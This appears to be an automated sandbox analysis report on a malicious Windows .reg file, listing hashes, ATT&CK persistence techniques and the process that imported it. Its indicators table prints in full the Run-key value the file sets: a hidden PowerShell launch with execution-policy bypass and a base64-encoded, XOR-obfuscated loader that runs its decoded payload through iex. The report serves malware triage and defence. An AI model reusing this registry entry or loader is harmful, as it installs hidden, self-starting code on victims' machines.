cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c

Resubmissions

07-11-2024 21:54

241107-1smw7s1rhm 10

Analysis

max time kernel
2s
max time network
4s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YjJqp0O3NZzC.reg
Size

89KB
MD5

e0fc383452ae4ef76fbd8edaaea8208a
SHA1

4101569ca940535cea9ddc24eab79a4c6ed5d790
SHA256

cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
SHA512

33160b4f22a42c3461cc8b193598d8abf20a5dc93965894c17856a08127474440211e3bda12d74f7ff1139ecebd07ec67efc64f3d75a396ccd44e83e73ebf832
SSDEEP

1536:GlyQtvJw8Tq6YLgbJSoR0Qbu+l0V1iiYio5RTQlAwUWzI1YWsV2vRrYTxWy0:PolxhbM6buNfibjTUUWzB5Hth0

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

regedit.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA="	regedit.exe

Runs .reg file with regedit 1 IoCs

Processes:

regedit.exe

pid	Process
460	regedit.exe

C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"
1⤵
- Adds Run key to start application
- Runs .reg file with regedit
PID:460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads